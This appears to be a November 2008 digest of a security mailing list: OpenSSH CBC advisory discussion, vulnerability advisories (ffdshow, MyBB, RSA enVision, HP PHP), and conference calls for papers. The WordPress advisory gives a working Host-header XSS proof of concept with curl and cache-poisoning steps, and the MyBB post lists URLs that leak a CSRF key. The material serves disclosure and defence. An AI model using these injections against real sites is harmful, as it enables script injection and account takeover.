Re: Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread dennis jackson
What documents have you been reading?

Take a look at the actual vulnerability advisory.
http://www.cpni.gov.uk/Docs/Vulnerability_Advisory_SSH.txt
Or the original posting by OpenSSH
http://www.securityfocus.com/archive/1/498558/30/0/threaded

Where is there any condition related to National Security?

If you read the vulnerability advisory you would see that the problem is a
design flaw in the SSH specification. OpenSSH was merely used as an example of
an implementation of SSH written to implement the specification.

It only takes a few seconds to realise that SSH is used in critical systems. We
have seen in recent weeks and months that we are all vulnerable to the security
of the banking systems. Anyone who uses online banking makes use of systems that
include SSH. Do the oil companies have a private network for ordering stocks?
What about weather stations or tidal guages, are they on private networks? Are
there any ISPs who don't use remote mangement?


on 24/11/08 8:04 PM, [EMAIL PROTECTED] wrote:

 Hey!

 They put a condition because of National Security. Should that mean
 that they use OpenSSH in National Security-sensitive applications
 (interesting ;););))?

 If so, should that mean that they implicitely recognize the very good
 work done by the community?

 If so, why not act politely with the community and share knowledge?

 This would make the software better, so that they could still use it in
 their applications.

 How can't they understand that?

 Why not just share the knowledge and just ask for some time (fixed
 amount? or just when a solution will be found) before public release
 of the details of the attacks?

 Why not release the details and switch to another system if OpenSSH is
 not what they need anymore?

 So one more entity that just want to benefit from FOSS, but not
 contribute...

 If I were the developpers, then I would just retaliate (humoristically)
 by sending them a similar (fake)-contract/NDA, asking them not to use
 OpenSSH, but share National Sensitive information. In other words, just
 ask them to share THEIR knowledge without US providing our tools.

 There are some times where I hate the BSD licence, because it does not
 force people to cooperate! (even if I don't think any other licence
 would help here...)

 My 2 cents and sorry for the off-topic subject...

 Cheers

 GM

 --
 Guillaume MULLER
 Post-Doc - Sala C2-50
 Laboratório de Técnicas Inteligentes (LTI)
 Depto. Eng. Computação e Sistemas Digitai(PCS)
 Escola Politécnica da Universidade de São Paulo
 Av. Prof. Luciano Gualberto, 158 travessa 3
 05508-900 - São Paulo - SP - Brasil
 Tel: +55 11 3091 5397
 http://www.lti.pcs.usp.br/~guillaume


Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread Nick Boyce
On Mon, Nov 24, 2008 at 11:39 PM, Damien Miller [EMAIL PROTECTED] wrote:

 On Mon, 24 Nov 2008, Nick Boyce wrote:

 Could someone please help the uncomprehending [i.e. me :-)] understand
 why or whether this is anything to be worried about at all ?

 Yes, the attack is very unlikely to work against an interactive
 connection.

  The usage pattern where the attack is most likely to succeed is where an
  automated connection is configured to retry indefinitely in the event of
  errors. In this case, it might be possible to recover as much as 14 bits
  of plaintext per hour
[...]
 Given the amount of data pumped down the typical automated connection
 per hour, this is hardly anything to worry about .. surely ?

 That depends on the data that is being transferred. If it includes
 sensitive information, then this leakage rate might be unacceptable.
[...]
 We provide this information so you can decide whether this attack
 is likely to succeed in your environment.

Thanks - I appreciate your post and clarification.
To be clear, I wasn't seeking to dispute your original post in any way
- rather I figured many of us non-cryptographers would like to be
*very* sure exactly what the exposure is, given that a weakness in SSH
protocol is often the cause of much fear, many missed meals and
remedial steps taken hurriedly :)

The original CPNI bulletin is less than helpful in stating :
   The severity is considered to be potentially HIGH due to the
   32 bits of plaintext that can be recovered.
leaving me wondering how to reconcile severity HIGH with 32 bits of
plaintext can be recovered.

Ignoring the attack success probability, I glean from your explanation
that there is only really a problem if, say, the SSH connection
transfers a simple 1, 2, 3 or 4 byte value which reveals a secret.

 at present we do not feel that this issue is serious enough to make an 
 emergency release

Maybe this was always clear, but along with that reassurance I guess
you would recommend we all take your stated remedial action :
   [place] the following directive in sshd_config and ssh_config:
   Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc
at the very next maintenance opportunity, on the grounds that it can't
hurt, and can only help ?

For instance, (and my apologies for not having looked in any detail at
possible compatibility issues), would it be fair to say the popular
PuTTY-client-with-OpenSSH-server scenario would be fine after the
above config change ?

Cheers
Nick Boyce
-- 
Science is the poetry of reality -- Richard Dawkins


Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread Damien Miller
On Mon, 24 Nov 2008, Nick Boyce wrote:

 [ahem] ... Sorry to be dumb, but ...
 
 On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller [EMAIL PROTECTED] wrote:
 
  Based on the description contained in the CPNI report and a slightly
  more detailed description forwarded by CERT this issue appears to be
  substantially similar to a known weakness in the SSH binary packet
  protocol first described in 2002 by Bellare, Kohno and Namprempre[2].
  The new component seems to be an attack that can recover 14 bits of
  plaintext with a success probability of 2^-14
 
 Could someone please help the uncomprehending [i.e. me :-)] understand
 why or whether this is anything to be worried about at all ?
 
 Quick calculator session :
 2^(-18) = 0.03814697265625
 2^(-14) = 0.6103515625
 
 So there is a vanishingly small probability that a Bad Guy may
 discover less than 2 characters from my command-line, every time they
 try this attack.  And each time they fail, my connection gets rudely
 chopped.  Two characters won't help them much.  They'd need to succeed
 about ten times per typed command-line to snoop on most of my
 sessions.  This weakness is surely of no conceivable use to a Bad Guy
 ?

Yes, the attack is very unlikely to work against an interactive
connection.

  The usage pattern where the attack is most likely to succeed is where an
  automated connection is configured to retry indefinitely in the event of
  errors. In this case, it might be possible to recover as much as 14 bits
  of plaintext per hour (assuming a very fast 10 connections per second).
  Implementing a limit on the number of connection retries (e.g. 256) is
  sufficient to render the attack infeasible for this case.
 
 Given the amount of data pumped down the typical automated connection
 per hour, this is hardly anything to worry about .. surely ?

That depends on the data that is being transferred. If it includes
sensitive information, then this leakage rate might be unacceptable.
On the other hand, I expect that most people aren't running automated
transfers that will retry enough for the attack to become feasible.

We provide this information so you can decide whether this attack
is likely to succeed in your environment.

-d



CanSecWest 2009 CFP (March 18-20 2009, Deadline December 8 2008)

2008-11-25 Thread Dragos Ruiu
Call For Papers

    The CanSecWest 2009 CFP is now open.

    Deadline is December 8th, 2008.

CanSecWest CALL FOR PAPERS

    VANCOUVER, Canada -- The tenth annual CanSecWest applied
    technical security conference - where the eminent figures
    in the international security industry will get together
    share best practices and technology - will be held in
    downtown Vancouver at the the Sheraton Wall Centre on
    March 18-20, 2009. The most significant new discoveries
    about computer network hack attacks and defenses,
    commercial security solutions, and pragmatic real world
    security experience will be presented in a series of
    informative tutorials.

    The CanSecWest meeting provides international researchers
    a relaxed, comfortable environment to learn from
    informative tutorials on key developments in security
    technology, and collaborate and socialize with their peers
    in one of the world's most scenic cities - a short drive
    away from one of North America's top skiing areas.

    The CanSecWest conference will also feature the
    availability of the Security Masters Dojo expert network
    security sensei instructors, and their advanced, and
    intermediate, hands-on training courses - featuring small
    class sizes and practical application exercises to
    maximize information transfer.

    We would like to announce the opportunity to submit
    papers, and/or lightning talk proposals for selection by
    the CanSecWest technical review committee. This year we
    will be doing one hour talks, and some shorter talk
    sessions.

    Please make your paper proposal submissions before
    December 8th, 2008.

    Some invited papers have been confirmed, but a limited
    number of speaking slots are still available. The
    conference is responsible for travel and acomodations for
    the speakers. If you have a proposal for a tutorial
    session then please email a synopsis of the material and
    your biography, papers and, speaking background to
    secwest09 [at] cansecwest.com . Only slides will be needed
    for the March paper deadline, full text does not have to
    be submitted - but will be accepted if available. This
    year we will be opening up the presentation guidelines to
    include talks not in English (particularly Chinese) which
    we will offer to translate for the speaker if they are not
    a native English speaker.

    The CanSecWest 2009 conference consists of tutorials on
    technical details about current issues, innovative
    techniques and best practices in the information security
    realm. The audiences are a multi-national mix of
    professionals involved on a daily basis with security
    work: security product vendors, programmers, security
    officers, and network administrators. We give preference
    to technical details and new education for a technical
    audience.

    The conference itself is a single track series of
    presentations in a lecture theater environment. The
    presentations offer speakers the opportunity to showcase
    on-going research and collaborate with peers while
    educating and highlighting advancements in security
    products and techniques. The focus is on innovation,
    tutorials, and education instead of product pitches. Some
    commercial content is tolerated, but it needs to be backed
    up by a technical presenter - either giving a valuable
    tutorial and best practices instruction or detailing
    significant new technology in the products.

    Paper proposals should consist of the following
    information:
     1. Presenter, and geographical location (country of
        origin/passport) and contact info (e-mail, postal
        address, phone, fax).
     2. Employer and/or affiliations.
     3. Brief biography, list of publications and papers.
     4. Any significant presentation and educational
        experience/background.
     5. Topic synopsis, Proposed paper title, and a one
        paragraph description.
     6. Reason why this material is innovative or significant
        or an important tutorial.
     7. Optionally, any samples of prepared material or
        outlines ready.
     8. Will you have full text available or only slides?
     9. Language of preference for submission.
    10. Please list any other publications or conferences
        where this material has been or will be
        published/submitted.

    Please include the plain text version of this information
    in your email as well as any file, pdf, sxw, ppt, or html
    attachments.

    Please forward the above information to secwest09 [at]
    cansecwest.com to be considered for placement on the
    speaker roster, or have your lightning talk scheduled. If
    you contact anyone else at our organization please ensure
    you also cc the submission address with your proposal or
    it may be omitted from the review process.


cheers,
--dr

--
World Security Pros. Cutting Edge Training, 

Re: [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)

2008-11-25 Thread Eygene Ryabinkin
Good day.

Mon, Nov 24, 2008 at 03:17:05PM +0700, svrt wrote:
 In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability
 in ffdshow which affects all available internet browsers.
   ^^^
Really?  And links, elinks, lynx, dillo and others are affected too?
What about my Firefox that (I assume) has no ffdshow code inside it and
there are no ffdshow-related plugins coupled to it?  Is it vulnerable?

I am really appreciate that you're searching for the issues and
releasing advisories -- thanks for doing this!  But, please, use the
appropriate wording, or your advisories will lead to controversial
feelings.

Sorry for being a bit bluffy :(
-- 
Eygene


Re: [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)

2008-11-25 Thread Nam Nguyen
The report is for ffdshow, but the referred URL is to ffdshow-tryout. I wonder 
if they are the same.

Cheers
Nam

On Mon, 24 Nov 2008 15:17:05 +0700
svrt [EMAIL PROTECTED] wrote:

 1. General Information
 
 ffdshow is a DirectShow filter and VFW codec for many audio and video 
 formats, such as DivX, Xvid and H.264. It is the most popular audio and 
 video decoder on Windows. Besides a stand-alone setup package, ffdshow is 
 often included in almost all codec pack software such as K-lite Codec Pack, 
 XP Codec Pack, Vista Codec Package, Codec Pack All in one,.
 
 In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability 
 in ffdshow which affects all available internet browsers. Taking advantage 
 of the flaw, hackers can perform remote attack, inject viruses, steal 
 sensitive information and even take control of the victim's system.
 
 Since ffdshow is an open source software (can be found at 
 http://sourceforge.net/projects/ffdshow-tryout), we have contacted the 
 developing team and they have patched the vulnerability in the latest 
 version of ffdshow.
 
 Details : http://security.bkis.vn/?p=277
 SVRT Advisory  : SVRT-05-08
 Initial vendor notification :  13-11-2008
 Release Date : 24-11-2008
 Update Date  : 24-11-2008
 Discovered by : SVRT-Bkis
 Security Rating :  Critical
 Impact  Remote : Code Execution
 Affected Software : ffdshow  ( rev2347 20081123)
 
 2. Technique Description
 
 The flaw occurs when ffdshow works with a media stream (e.g. 
 http://[website]/test.avi). On parsing an overly long link, ffdshow would 
 encounter a buffer overflow error as the memory is not allocated and 
 controlled well.
 
 ffdshow is in fact a codec component for decoding multimedia formats so it 
 must be used via some media player; the default program is Windows Media 
 Player (wmp). Due to this reason, all internet browsers that support wmp 
 plug-in are influenced by this vulnerability, such as Internet Explorer, 
 Firefox, Opera, Chrome...
 
 In order to exploit, hackers trick users into visiting a website containing 
 malicious code. If successful, malicious code would be executed without any 
 users' further interaction. Hackers can then take complete control of the 
 system.
 
 3. Solution
 
 As for the seriousness of the vulnerability, it has been patched in the 
 latest version of ffdshow by the developing team of the software. Bkis 
 Internetwork Security Center highly recommends that users should update 
 ffdshow to the latest version here: 
 http://sourceforge.net/project/showfiles.php?group_id=173941package_id=199416release_id=439904
 
 At the moment, there are a lot of software packages packing ffdshow that 
 haven't been updated. On account of this, users should also update the 
 ffdshow latest versions:
 - K-Lite Codec Pack (lastest version).
 - XP Codec Pack (lastest version).
 - Vista Codec Package (lastest version).
 - Codec Pack All in one (lastest version).
 - Storm Codec Pack (lastest version).
 - And many other software Codec packages using ffdshow.
 
 In addition, software producers that make use of ffdshow in their products 
 should also update these products with the latest version of ffdshow.
 
 4. Credits
 Thanks Nguyen Anh Tai for working with SVRT-Bkis.
 
 
 Bach Khoa Internetwork Security Center (BKIS)
 Hanoi University of Technology (Vietnam)
 
 Email : [EMAIL PROTECTED]
 Website : www.bkav.com.vn
 WebBlog : security.bkis.vn
 Our PGP : http://security.bkis.vn/policy/pgp/SVRT-Bkis.gpg
  
 
 
 
 


-- 
Nam


Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread Fabian Hänsel
Nick Boyce [EMAIL PROTECTED] wrote:

 [ahem] ... Sorry to be dumb, but ...
 
 On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller [EMAIL PROTECTED]
 wrote:
 
  Based on the description contained in the CPNI report and a slightly
  more detailed description forwarded by CERT this issue appears to be
  substantially similar to a known weakness in the SSH binary packet
  protocol first described in 2002 by Bellare, Kohno and Namprempre
  [2]. The new component seems to be an attack that can recover 14
  bits of plaintext with a success probability of 2^-14
 
 Could someone please help the uncomprehending [i.e. me :-)] understand
 why or whether this is anything to be worried about at all ?
 
 Quick calculator session :
 2^(-18) = 0.03814697265625
 2^(-14) = 0.6103515625
 
 So there is a vanishingly small probability that a Bad Guy may
 discover less than 2 characters from my command-line, every time they
 try this attack.  And each time they fail, my connection gets rudely
 chopped.  Two characters won't help them much.  They'd need to succeed
 about ten times per typed command-line to snoop on most of my
 sessions.  This weakness is surely of no conceivable use to a Bad Guy

You could still use this attack in DOS scenarios. Through those
connection terminations the service quality is reduced. You could e.g.
lock admins out (prevent security updates, have more time for time-
consuming attacks which would otherwise be reset from time to time
by admins, ...) or reduce transmission rate of security logs by machines
without harddisk using SSH like a VPN to send logs to some central
server or in general could inhibit many vital processes based on SSH.
Thus you could increase your chances of other attacks. And of course
you can attack the service ssh itself.

(all those could be prevented by the use of a VPN - but most people
won't take this effort if they don't really need to do so and therefore
don't have one set up when they would need it)

Best regards
  Fabian


MyBB 1.4.3 my_post_key Disclosure Vulnerability

2008-11-25 Thread [EMAIL PROTECTED]

##
#MyBB 1.4.3 my_post_key Disclosure Vulnerability by NBBN 
(http://nbbnsblog.co.cc)  
#

##

Vendor: http://mybboard.net
Date: November 25, 2008

These URLs contains my_post_key. Moderators and admins use these 
sometimes, depending on what they want to do with a thread.

my_post_key is used to perform various actions and to prevent CSRF.

   
These pages shows the posts of the users. If some of these posts have 
pictures, the referrer will be transfered to the server of the images.
#Vuln 
URLs#
http://localhost/mybb/moderation.php?action=mergepoststid=1modtype=threadmy_post_key=[key]  
#
http://localhost/mybb/moderation.php?action=splittid=1modtype=threadmy_post_key=[key]   
#
http://localhost/mybb/moderation.php?action=deletepoststid=1modtype=threadmy_post_key=[key]   
#
 



   
Finally, an attacker has the postkey, and can perform some interesting 
moderator or administrator actions with csrf.




New tool and paper for Oracle forensics...

2008-11-25 Thread David Litchfield

Hey all,
I've just posted a new tool and paper for Oracle forensics. The tool, 
orablock, allows a forensic investigator to dump data from a cold Oracle 
data file - i.e. there's no need to load up the data file in the database 
which would cause the data file to be modified, so using orablock preserves 
the evidence. Orablock can also be used to locate stale data - i.e. data 
that has been deleted or updated. It can also be used to dump SCNs for data 
blocks which can be useful during the examination of a compromised Oracle 
box. Indeed, this is the subject of the paper Oracle Forensics Part 7: 
Using the Oracle System Change Number in Forensic Examinations. Both the 
tool (which compiles on Linux, Mac OS X and Windows) and the paper are 
available from http://www.databasesecurity.com/.

Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402


Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread Bob Beck
 Maybe this was always clear, but along with that reassurance I guess
 you would recommend we all take your stated remedial action :
[place] the following directive in sshd_config and ssh_config:
Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc
 at the very next maintenance opportunity, on the grounds that it can't
 hurt, and can only help ?

It can possibly hurt very much - if ctr mode is subject to a
different vulnerablility. There has been much discussion of ctr mode having
*possible* issues, although nothing I know of published directly about ssh. 

On the other hand, we have a national security agency who refuses
full disclosure, raising a vulnerability and pointing to a switch to
counter mode.  Perhaps this is to prevent the low likelyhood but
possible attack they have found, or perhaps it is to encourage a hasty
switch to counter mode which is more convenient for national security
reasons. I don't honestly know - the only REAL info on the subject I've
seen has come from djm. 

You decide who you trust. personally, I won't be making that change
hastily anywhere - Nothing I have is directly threatened by this
attack, so I can wait until someone figures out the jist of it and
implents an appropriate countermeasure, and I see some legitimate peer
review on the topic as opposed to FUD spreading. I frankly trust the
OpenSSH developers a lot more than I trust ssh.com or a puppet state
no such agency acting as worn out lapdog for the sorts of people
that implement things like the patriot act. People who will not share
information with the developers of the software should always be
suspect. They have no reason not to without a hidden agenda.

  -Bob





[security bulletin] HPSBTU02382 SSRT080132 rev.1 - HP Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX running PHP, Remote Denial of Service (DoS) or Arbitrary Code Execution

2008-11-25 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01599836
Version: 1

HPSBTU02382 SSRT080132 rev.1 - HP Secure Web Server for Tru64 UNIX or Internet 
Express for Tru64 UNIX running PHP, Remote Denial of Service (DoS) or Arbitrary 
Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2008-11-25
Last Updated: 2008-11-25

Potential Security Impact: Remote Denial of Service (DoS) or arbitrary code 
execution.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in PHP running on the HP 
Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX. The 
vulnerability could be exploited remotely to cause a Denial of Service (DoS) or 
to execute arbitrary code.

References: CVE-2008-3658

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Secure Web Server for Tru64 UNIX v 6.8.0 or earlier 
HP Internet Express for Tru64 UNIX v 6.8 
HP Internet Express for Tru64 UNIX v 6.7 
HP Internet Express for Tru64 UNIX v 6.6 

BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
CVE-2008-3658 (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP is releasing the following Early Release Patch (ERP) kits publicly for use 
by any customer until updates are available in mainstream release patch kits. 

The resolutions contained in the ERP kits are targeted for availability in the 
following mainstream kit: 

HP Internet Express for Tru64 UNIX v 6.9

The ERP kits use dupatch to install and will not install over any Customer 
Specific Patches (CSPs) that have file intersections with the ERPs. Contact 
your service provider for assistance if the installation of the ERPs is blocked 
by any of your installed CSPs.

The ERP kit provides apache-tomcat-5.5.26, apache_1.3.39, httpd-2.2.6, 
php-4.4.9 souces and licenses.

HP Secure Web Server for Tru64 UNIX v 6.8.0 or earlier, HP Internet Express for 
Tru64 UNIX v 6.6, v 6.7, or v 6.8 
PREREQUISITE: HP Tru64 UNIX v 5.1B-4 PK6 (BL27) or v 5.1B-3 PK5 (BL26) 
Name: SWS-681.tar.gz 
Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=SWS-6.81; 
show=replacehttp://www.itrc.hp.com/service/patch/patchDetail.do?patchid=SWS-681
 
 


MD5 checksums are available from the ITRC patch database main page. From the 
patch database main page, click Tru64 UNIX, then click verifying MD5 checksums 
under useful links.

PRODUCT SPECIFIC INFORMATION 

HISTORY 

Version:1 (rev.1) - 25 November 2008 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing  Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 


System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers 

Re: Microsoft VISTA TCP/IP stack buffer overflow

2008-11-25 Thread dale
So, let me try and understand this.



According to what you have written, and the MSDN documentation on this 
CreateIpForwardEntry2 call, you need to be (at least) a member of the 
Administrators group.



So how is this security vulnerability any different to me creating a program, 
which will require the same Administrative rights, to say, wipe the boot 
configuration file?


RSA EnVision Remote Password Disclosure

2008-11-25 Thread nicolas . viot




I Reference



Title: RSA EnVision Remote Password Disclosure

URL: http://www.secfault.org/?p=78



II. BACKGROUND



RSA EnVision, a product of RSA Security, is a platform allowing gathering and 
analysis of security events and logs.



RSA Security is a subsdiary company of EMC Corporation.



III. DESCRIPTION



The RSA EnVision platform provides a web console which enables administration 
of the solution and  analysis of security events.



A vulnerability exists in this web application, allowing a remote anonymous 
attacker to retrieve the hash of the password used for authentication.



Using a dictionnary or a bruteforce attack against this hash, a remote attacker 
can gain administration privilege on the EnVision web console.



This vulnerability is due to a lack of access control on the user profile 
functionnality.



Step to reproduce:



The step to reproduce the vulnerability will be disclosure Novembre 28 2008.



IV. IMPACT



Successful exploitation allows remote attackers to gain access to hash of 
password used to authenticate users of the web console.



Using a dictionnary or a bruteforce attack against the retrieved hash, a remote 
attacker can gain administration privilege on the EnVision web console.



V. PRODUCT AFFECTED



The vulnerability was sucessfully exploited on enVision v3.7.0 Build: 0169.



EMC has reported the following versions to be affected:



RSA EnVision 3.5.0, 3.5.1, 3.5.2 and 3.7.0



VI. REMEDIATION



Apply the vendor patch corresponding to your version of RSA EnVision:

https://knowledge.rsasecurity.com/





VII. DISCLOSURE TIMELINE

10/30/2008 Initial vendor notification

10/31/2008 Initial vendor response

11/21/2008 Patch release and coordinated public advisory disclosure

11/28/2008 Detailed vulnerability information disclosure



VIII. VENDOR REFERENCE



EMC Security Alert (ESA) identifier : ESA-08-017



IX. CREDIT



This vulnerability was discovered by Nicolas Viot [EMAIL PROTECTED]

Intrinsec is a french company specialized in business continuity and security : 
http://www.intrinsec.com




WordPress XSS vulnerability in RSS Feed Generator

2008-11-25 Thread Jeremias Reith

= noXSS.org Security Advisory ==

Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith [EMAIL PROTECTED]
Published: 2008/11/25
Affected: WordPress  2.6.5


Summary
===

WordPress prior to v2.6.3 fails to sanitize the Host header variable
correctly when generating RSS feeds and is therefore prune to XSS
attacks.

Web Sites running in a name based virtual hosting setup are not
affected as long as they are not the default virtual host.
Moreover we only found installations running on the Apache web server
to be affected.


Vulnerability Details
=

The function self_link() in wp-includes/feed.php is used to generate
absolute URLs for the atom:link tag in ATOM and RSS 2.0 feeds:

function self_link() {
  echo 'http'
   . ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'
   . $_SERVER['HTTP_HOST']
   . wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);
}

The function does not sanitize the HTTP_HOST variable in any way but
WordPress replaces all $_SERVER variables with escaped ones in
wp-settings.php:

$_SERVER = add_magic_quotes($_SERVER);

In almost all setups add_magic_quotes() runs
mysql_real_escape_string() over the elements and returns the modified
array. Unfortunately this escaping method is not safe in markup
context.


PoC


The Apache web server only disallows '/', '\' and '..' within the host
header. The header can therefore contain markup making the following
PoC possible:

curl -H Host: \body onload=alert(String.fromCharCode(88,83,83)) \
http://www.example.org/blog/feed

The given example request will return (without additional newlines):

-- snip --
...
atom:link href=http://\;
body onload=alert(String.fromCharCode(88,83,83))
/blog/feed rel=self type=application/rss+xml /
...
-- snip --

The embedded JavaScript will be executed in Firefox 3.0.4 due to the
triggered switch to Quirks mode.


Exploit
===

The following exploit is a semi-stored XSS attack and has been tested
with the following setup:

- Apache 2.x with IP based virtual hosting
- Wordpress 2.6.3 installed in /blog/
- WP Super Cache 0.84
- Firefox 3.0.4


WP Super Cache is a popular WordPress plugin that adds static file
caching to WordPress. It greatly increases performance and is
often used. It saves generated pages in the wp-content/cache directory
and adds mod_rewrite rules to serve cached pages statically.

Issuing a malicious request to a vulnerable WordPress installation
will lead to a file containing the XSS to be generated and placed
within the document root.

Request:
curl -H Host: \body onload=alert(String.fromCharCode(88,83,83)) \
http://www.example.org/blog/feed

Generated file:
http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even tough the feed is
XML because the file is served as text/html.

The only missing the step is the calculation cached file's MD5 sum.

The following code generates the MD5 checksum:

php -r 'echo md5(\body  
onload=alert(String.fromCharCode(88,83,83)).

  /blog/feed), \n;'

In the default setup the MD5 sum can be generated by concatenating the
contents of HTTP_HOST and REQUEST_URI resulting in
0d2ca4617758433a7864d57493be2c5b for the given example.

This file can be accessed until the cache expiration mechanism removes
it. The default expire time is 3600 seconds.


Vendor Response
===
2008-11-17 Reported to vendor
2008-11-17 Initial response from vendor
2008-11-25 Release of version 2.6.5




smime.p7s
Description: S/MIME cryptographic signature


Re: Microsoft VISTA TCP/IP stack buffer overflow

2008-11-25 Thread Edi Strosar
Administrator lives in Ring 3 while this crash happens in Ring 0. 
Nobody, not even Admin shouldn't be able to corrupt kernel space. It's 
not a security issue per se - it's just a bug.



[EMAIL PROTECTED] wrote:

So, let me try and understand this.

According to what you have written, and the MSDN documentation on this 
CreateIpForwardEntry2 call, you need to be (at least) a member of the 
Administrators group.

So how is this security vulnerability any different to me creating a program, 
which will require the same Administrative rights, to say, wipe the boot configuration 
file?






[CFP] FRHACK 01 Call For Papers (save the dates!)

2008-11-25 Thread Jerome Athias
[CFP] FRHACK 01 Call For Papers

##

   ###   #     ###  
#   ### 
     ##   #   
###   ###  
   ###   ###      #  
   ###      
   ###   ###     ###
###  
   ###   ###        
###  
   ########   ###   
##   
   ##  #        
 
   ###   ###  #    ###  
### #
   ###   ###   #      ###    
   ###      
   ###   ####          ##  
##   ####
   ###   ###     ###   
##   ###  


 
FRHACK: By Hackers, For Hackers! http://www.frhack.org
##

++
+ FRHACK 01
+ Call For Papers
+ September 7-8, 2009, at the Great Kursaal Hall of Besançon, France.
++

Do you like good wine, french bread  food, strikes and the french kiss?
If so, you will love FRHACK!

[ - Introduction - ]

FRHACK is the First International IT Security Conference, by hackers -
for hackers, in France!
FRHACK is not commercial - but - highly technical.

Target Audience: Security Officers, Security Professionals and Product
Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and
Firewall Administrators, Teachers, Academic Researchers and Software
Developers.

The FRHACK Team (TFT) encourages speakers to present new and interesting
projects for FRHACK 01 and will give preferential treatment to
submissions that have not been presented at other conferences.
Further, TFT invites any individual who has not spoken at a conference
before to submit a talk and attempt to make FRHACK their inaugural event!
TFT encourages girls passionated by IT Security to submit papers, as TFT
will offer a prize to the Best IT Security girl of the year to reward
innovation.
Papers can be submitted in English and/or French.
The conference language is either English or French.

Conference will be held in Besançon - EU, East of France, closer to
Switzerland, and aims to get together industry, government, academia and
underground hackers to share knowledge and leading-edge ideas about
information security and everything related to it.
FRHACK will feature national and international speakers and attendees
with a wide range of skills.
The atmosphere is favorable to present all facets of computer security
subject and will be a great opportunity to network with like-minded
people and enthusiasts.

[ - The venue - ]

FRHACK 01 (1st edition) will take place at the Great Kursaal Hall of
Besançon with capacity for up to 1400 people.

[*] About Besançon (stolen from http://en.wikipedia.org/wiki/Besan%C3%A7on)

Besançon is the capital and principal city of the Franche-Comté region
in eastern France. Located close to the border with Switzerland, it is
the capital of the Doubs department.
As well as being famed as one of France's finest villes d'art (art
cities), Besançon is the seat of one of France's older universities, of
France's National School of Mechanics and Micromechanics, and one of the
best known French language schools in France, the CLA. It is also
reputed to be France's most environmentally-friendly city, with a public
transport network that has often been cited as a model. On account of
the topography, the historic city centre lies at the edge of the modern
city, and hiking tracks lead straight from the centre and up into the
surrounding hills.
The Citadel of Besançon dates back to the Celtic era. In his De Bello
Gallicum, Julius Caesar already said about the fortress of Vesontio
(celtic name of Besançon) that it was one of the best defensive sites he
had ever seen.
Besançon is situated at the crossing of two major lines of
communication, the NE-SW route, following the valley of the river Doubs,
and linking Germany and North Europe with Lyon and southwest Europe, and
the N-S route linking northern France and the Netherlands with
